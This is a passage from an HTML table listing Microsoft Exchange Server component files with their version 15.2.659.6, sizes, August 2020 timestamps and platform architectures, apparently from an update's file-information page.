0</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.drumtesting.calendarmigration.dll</td><td>15.2.659.6</td><td>45,952</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.drumtesting.common.dll</td><td>15.2.659.6</td><td>18,816</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.dxstore.dll</td><td>15.2.659.6</td><td>473,480</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.dxstore.ha.events.dll</td><td>15.2.659.6</td><td>206,216</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.dxstore.ha.instance.exe</td><td>15.2.659.6</td><td>36,736</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.eac.flighting.dll</td><td>15.2.659.6</td><td>131,464</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgecredentialsvc.exe</td><td>15.2.659.6</td><td>21,888</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.common.dll</td><td>15.2.659.6</td><td>148,352</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.datacenterproviders.dll</td><td>15.2.659.6</td><td>220,040</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.eventlog.dll</td><td>15.2.659.6</td><td>23,944</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.edgesyncsvc.exe</td><td>15.2.659.6</td><td>97,664</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.ediscovery.export.dll</td><td>15.2.659.6</td><td>1,266,040</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.ediscovery.export.dll.deploy</td><td>15.2.659.6</td><td>1,266,040</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.application</td><td>Not applicable</td><td>15,856</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.exe.deploy</td><td>15.2.659.6</td><td>87,432</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.manifest</td><td>Not applicable</td><td>66,827</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.strings.dll.deploy</td><td>15.2.659.6</td><td>52,096</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.mailboxsearch.dll</td><td>15.2.659.6</td><td>292,224</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.birthdaycalendar.dll</td><td>15.2.659.6</td><td>73,088</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.defaultservicesettings.dll</td><td>15.2.659.6</td><td>45,960</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.dll</td><td>15.2.659.6</td><td>218,504</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.management.dll</td><td>15.2.659.6</td><td>78,216</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.bookings.dll</td><td>15.2.659.6</td><td>35,712</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.calendaring.dll</td><td>15.2.659.6</td><td>936,832</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.common.dll</td><td>15.2.659.6</td><td>336,256</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.connectors.dll</td><td>15.2.659.6</td><td>52,616</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.contentsubmissions.dll</td><td>15.2.659.6</td><td>32,136</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.context.dll</td><td>15.2.659.6</td><td>60,800</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.datamodel.dll</td><td>15.2.659.6</td><td>854,408</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.fileproviders.dll</td><td>15.2.659.6</td><td>291,720</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.foldersharing.dll</td><td>15.2.659.6</td><td>39,288</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.holidaycalendars.dll</td><td>15.2.659.6</td><td>76,168</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.insights.dll</td><td>15.2.659.6</td><td>166,784</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetinglocation.dll</td><td>15.2.659.6</td><td>1,486,720</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetingparticipants.dll</td><td>15.2.659.6</td><td>122,248</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetingtimecandidates.dll</td><td>15.2.659.6</td><td>12,327,296</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.onlinemeetings.dll</td><td>15.2.659.6</td><td>264,064</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.people.dll</td><td>15.2.659.6</td><td>37,760</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.peopleinsights.dll</td><td>15.2.659.6</td><td>186,760</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.reminders.dll</td><td>15.2.659.6</td><td>64,392</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.schedules.dll</td><td>15.2.659.6</td><td>83,848</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.shellservice.dll</td><td>15.2.659.6</td><td>63,880</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.tasks.dll</td><td>15.2.659.6</td><td>100,232</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.xrm.dll</td><td>15.2.659.6</td><td>144,768</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entityextraction.calendar.dll</td><td>15.2.659.6</td><td>270,216</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.common.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.configuration.dll</td><td>15.2.659.6</td><td>15,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.dll</td><td>15.2.659.6</td><td>130,440</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.ews.configuration.dll</td><td>15.2.659.6</td><td>254,344</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.exchangecertificate.eventlog.dll</td><td>15.2.659.6</td><td>13,176</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.exchangecertificateservicelet.dll</td><td>15.2.659.6</td><td>37,248</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.internal.dll</td><td>15.2.659.6</td><td>640,896</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.partner.dll</td><td>15.2.659.6</td><td>37,248</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.federateddirectory.dll</td><td>15.2.659.6</td><td>146,304</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.ffosynclogmsg.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.dll</td><td>15.2.659.6</td><td>594,816</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.eventlogs.dll</td><td>15.2.659.6</td><td>14,712</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendtransport.monitoring.dll</td><td>15.2.659.6</td><td>30,080</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.griffin.variantconfiguration.dll</td><td>15.2.659.6</td><td>99,720</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.hathirdpartyreplication.dll</td><td>15.2.659.6</td><td>42,368</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.helpprovider.dll</td><td>15.2.659.6</td><td>40,320</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.addressfinder.dll</td><td>15.2.659.6</td><td>54,152</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.common.dll</td><td>15.2.659.6</td><td>164,224</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.diagnostics.dll</td><td>15.2.659.6</td><td>58,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.flighting.dll</td><td>15.2.659.6</td><td>204,160</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.passivemonitor.dll</td><td>15.2.659.6</td><td>17,792</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.proxyassistant.dll</td><td>15.2.659.6</td><td>30,600</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routerefresher.dll</td><td>15.2.659.6</td><td>38,792</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routeselector.dll</td><td>15.2.659.6</td><td>48,520</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routing.dll</td><td>15.2.659.6</td><td>180,608</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpredirectmodules.dll</td><td>15.2.659.6</td><td>36,736</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.httputilities.dll</td><td>15.2.659.6</td><td>25,984</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.data.dll</td><td>15.2.659.6</td><td>1,868,168</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.diagnosisutil.dll</td><td>15.2.659.6</td><td>54,656</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.eopinstantprovisioning.dll</td><td>15.2.659.6</td><td>35,704</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.idserialization.dll</td><td>15.2.659.6</td><td>35,712</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll</td><td>15.2.659.6</td><td>18,304</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll.fe</td><td>15.2.659.6</td><td>18,304</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4.exe</td><td>15.2.659.6</td><td>263,048</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.exe.fe</td><td>15.2.659.6</td><td>263,048</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4service.exe</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4service.exe.fe</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imapconfiguration.dl1</td><td>15.2.659.6</td><td>53,128</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.inference.common.dll</td><td>15.2.659.6</td><td>216,968</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.hashtagsrelevance.dll</td><td>15.2.659.6</td><td>32,128</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.inference.peoplerelevance.dll</td><td>15.2.659.6</td><td>281,992</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.ranking.dll</td><td>15.2.659.6</td><td>18,824</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.safetylibrary.dll</td><td>15.2.659.6</td><td>83,848</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.service.eventlog.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.assistantsclientresources.dll</td><td>15.2.659.6</td><td>94,080</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.dll</td><td>15.2.659.6</td><td>1,840,000</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.eventlog.dll</td><td>15.2.659.6</td><td>71,552</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.meetingvalidator.dll</td><td>15.2.659.6</td><td>175,488</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.instantmessaging.dll</td><td>15.2.659.6</td><td>45,944</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.irm.formprotector.dll</td><td>15.2.659.6</td><td>159,624</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.msoprotector.dll</td><td>15.2.659.6</td><td>51,072</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.ofcprotector.dll</td><td>15.2.659.6</td><td>45,952</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.isam.databasemanager.dll</td><td>15.2.659.6</td><td>32,128</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.isam.esebcli.dll</td><td>15.2.659.6</td><td>100,232</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.jobqueue.eventlog.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.jobqueueservicelet.dll</td><td>15.2.659.6</td><td>271,240</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.killswitch.dll</td><td>15.2.659.6</td><td>22,400</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.killswitchconfiguration.dll</td><td>15.2.659.6</td><td>33,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.auditing.dll</td><td>15.2.659.6</td><td>18,312</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.certificatelog.dll</td><td>15.2.659.6</td><td>15,240</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll</td><td>15.2.659.6</td><td>27,528</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.easlog.dll</td><td>15.2.659.6</td><td>30,592</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.ecplog.dll</td><td>15.2.659.6</td><td>22,408</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.eventlog.dll</td><td>15.2.659.6</td><td>66,432</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.ewslog.dll</td><td>15.2.659.6</td><td>29,568</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll</td><td>15.2.659.6</td><td>19,840</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.groupescalationlog.dll</td><td>15.2.659.6</td><td>20,352</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.httpproxylog.dll</td><td>15.2.659.6</td><td>19,328</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.hxservicelog.dll</td><td>15.2.659.6</td><td>34,176</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.iislog.dll</td><td>15.2.659.6</td><td>103,816</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.lameventlog.dll</td><td>15.2.659.6</td><td>31,608</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.migrationlog.dll</td><td>15.2.659.6</td><td>15,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll</td><td>15.2.659.6</td><td>20,864</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.oauthcafelog.dll</td><td>15.2.659.6</td><td>16,256</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.outlookservicelog.dll</td><td>15.2.659.6</td><td>49,024</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.owaclientlog.dll</td><td>15.2.659.6</td><td>44,416</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.owalog.dll</td><td>15.2.659.6</td><td>38,272</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.perflog.dll</td><td>15.2.659.6</td><td>10,375,040</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.pfassistantlog.dll</td><td>15.2.659.6</td><td>29,064</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.rca.dll</td><td>15.2.659.6</td><td>21,376</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.restlog.dll</td><td>15.2.659.6</td><td>24,448</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.store.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll</td><td>15.2.659.6</td><td>21,896</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.core.dll</td><td>15.2.659.6</td><td>89,472</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.auditing.dll</td><td>15.2.659.6</td><td>20,864</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.certificatelog.dll</td><td>15.2.659.6</td><td>26,504</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.cmdletinfralog.dll</td><td>15.2.659.6</td><td>21,376</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.common.dll</td><td>15.2.659.6</td><td>28,040</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.easlog.dll</td><td>15.2.659.6</td><td>28,552</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.errordetection.dll</td><td>15.2.659.6</td><td>36,224</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.ewslog.dll</td><td>15.2.659.6</td><td>16,768</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.griffinperfcounter.dll</td><td>15.2.659.6</td><td>19,848</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.groupescalationlog.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.httpproxylog.dll</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.hxservicelog.dll</td><td>15.2.659.6</td><td>19,840</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.iislog.dll</td><td>15.2.659.6</td><td>57,224</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.migrationlog.dll</td><td>15.2.659.6</td><td>17,792</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.oabdownloadlog.dll</td><td>15.2.659.6</td><td>18,816</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.oauthcafelog.dll</td><td>15.2.659.6</td><td>16,256</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.outlookservicelog.dll</td><td>15.2.659.6</td><td>17,800</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.owaclientlog.dll</td><td>15.2.659.6</td><td>15,240</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.owalog.dll</td><td>15.2.659.6</td><td>15,240</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.perflog.dll</td><td>15.2.659.6</td><td>52,616</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.pfassistantlog.dll</td><td>15.2.659.6</td><td>18,312</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.rca.dll</td><td>15.2.659.6</td><td>34,184</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.restlog.dll</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.store.dll</td><td>15.2.659.6</td><td>18,816</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll</td><td>15.2.659.6</td><td>43,392</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loguploader.dll</td><td>15.2.659.6</td><td>165,248</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loguploaderproxy.dll</td><td>15.2.659.6</td><td>54,656</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.assistants.dll</td><td>15.2.659.6</td><td>9,056,128</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.attachmentthumbnail.dll</td><td>15.2.659.6</td><td>33,152</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.common.dll</td><td>15.2.659.6</td><td>124,288</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.crimsonevents.dll</td><td>15.2.659.6</td><td>82,824</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxassistants.eventlog.dll</td><td>15.2.659.6</td><td>14,216</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxassistants.rightsmanagement.dll</td><td>15.2.659.6</td><td>30,088</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxloadbalance.dll</td><td>15.2.659.6</td><td>661,376</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxloadbalance.serverstrings.dll</td><td>15.2.659.6</td><td>63,352</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll</td><td>15.2.659.6</td><td>175,488</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.common.dll</td><td>15.2.659.6</td><td>2,791,808</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.complianceprovider.dll</td><td>15.2.659.6</td><td>53,120</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.contactsyncprovider.dll</td><td>15.2.659.6</td><td>151,928</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.dll</td><td>15.2.659.6</td><td>966,528</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.easprovider.dll</td><td>15.2.659.6</td><td>185,216</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.eventlog.dll</td><td>15.2.659.6</td><td>31,616</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.googledocprovider.dll</td><td>15.2.659.6</td><td>39,800</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.imapprovider.dll</td><td>15.2.659.6</td><td>105,856</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.mapiprovider.dll</td><td>15.2.659.6</td><td>95,104</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.popprovider.dll</td><td>15.2.659.6</td><td>43,392</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyclient.dll</td><td>15.2.659.6</td><td>18,816</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyservice.dll</td><td>15.2.659.6</td><td>172,928</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.pstprovider.dll</td><td>15.2.659.6</td><td>102,784</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.remoteprovider.dll</td><td>15.2.659.6</td><td>98,680</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.storageprovider.dll</td><td>15.2.659.6</td><td>188,808</td><td>12-Aug-2020